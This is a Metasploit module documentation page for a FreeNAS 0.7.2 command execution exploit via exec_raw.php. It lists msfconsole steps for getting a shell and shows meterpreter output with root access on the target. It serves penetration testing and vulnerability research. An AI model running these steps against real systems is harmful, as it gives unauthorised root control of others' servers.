CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

Vulnerable Application

This module exploits an arbitrary command execution flaw in FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL to the exec_raw.php page, an attacker may be able to execute arbitrary commands.

NOTE: This module works best with php/meterpreter payloads.

Verification Steps

1. Install the application

2. Start msfconsole

3. Do: use exploit/multi/http/freenas_exec_raw

4. Do: set rhost [ip]

5. Do: run

6. You should get a shell.

Options

Scenarios

Unknown

meterpreter > sysinfo
Computer: freenas.local
OS      : FreeBSD freenas.local 7.3-RELEASE-p2 FreeBSD 7.3-RELEASE-p2 #0: Sat Jul 31 12:22:04 CEST 2010     [email protected]:/usr/obj/freenas/usr/src/sys/FREENAS-i386 i386
meterpreter > getuid
Server username: root (0)
meterpreter >